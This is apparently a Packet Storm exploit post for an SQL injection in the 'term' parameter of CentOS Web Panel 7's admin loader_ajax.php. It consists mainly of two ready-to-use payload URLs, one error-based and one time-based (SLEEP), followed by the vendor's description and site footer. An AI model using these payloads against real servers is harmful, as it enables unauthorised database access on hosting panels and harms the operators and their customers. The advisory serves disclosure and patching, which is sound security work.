CentOS Webpanel version 7 suffers from a remote SQL injection vulnerability.
e53b5c9a3afbce2e2af8903eaa3942eac11f5bf27fd53e3eebacfbf1805f53b3# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
# Google Dork: N/A
# Date: 2020-03-03
# Exploit Author: Berke YILMAZ
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/
# Version: v6 - v7
# Tested on: Kali Linux - Windows 10
# CVE : N/A
# Type: Error Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO
# Type: Time Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
OR SLEEP(5)-- JCpP
Centos-Webpanel (http://centos-webpanel.com/)
CentOS Web Panel | Free Linux Web Hosting Control Panel
Free CentOS Linux Web Hosting control panel designed for quick and easy
management of (Dedicated & VPS) servers without of need to use ssh console
for every little thing
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed